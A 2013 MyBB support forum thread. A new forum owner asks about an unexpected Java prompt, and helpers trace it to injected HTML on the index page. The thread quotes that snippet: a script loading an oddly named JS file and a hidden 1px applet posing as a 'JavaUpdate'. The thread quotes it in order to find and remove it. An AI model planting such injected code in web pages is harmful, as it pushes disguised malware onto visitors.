MyBB Community Forums

Full Version: Java
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
I'm getting this above my forums? http://prntscr.com/1mqqpb and other people are too, it never used to be there but randomly shows now and I've downloaded the newest version of java?
What's your forum URL?
Something to do with the index page only. Its not appearing on other pages. Can you post your index template and index.php?
There's some nasty HTML being added at the bottom.

<html>
<head>
<script language="javascript" src="Hh5JpHg63.js"></script>
<applet width='1px' height='1px' code='Java.class' archive='Java.jar' name='JavaUpdate'></applet>
</head>
<body>

</body>
</html>

I would highly advise removing it. It only seems to be present on the index page, so I would look at the index template and the index.php file.
http://prntscr.com/1mrirp i got this, do I add that code in you gave me? at the top where it shows java stuff? which stuff do I take out in replace or just take out? I'm still new to all this sorry, my first forums..
No, that's code you should remove. It looks like it's not in your index template. Can you attach a copy of your index.php file?
(2013-08-22, 05:18 PM)Fábio Maia Wrote: [ -> ]No, that's code you should remove. It looks like it's not in your index template. Can you attach a copy of your index.php file?

I don't know how to find that.. sorry :/ I'm so bad, I should have studied stuff about mybb and everything because I have like no experience really and don't know what a lot of things are or where they are..
Open your actual index.php file.
Bugz Wrote:I don't know how to find that.. sorry :/ I'm so bad, I should have studied stuff about mybb and everything because I have like no experience really and don't know what a lot of things are or where they are..

Go to ACP>Templates & Themes>Templates>YOUR THEME>Index Templates>Index
Pages: 1 2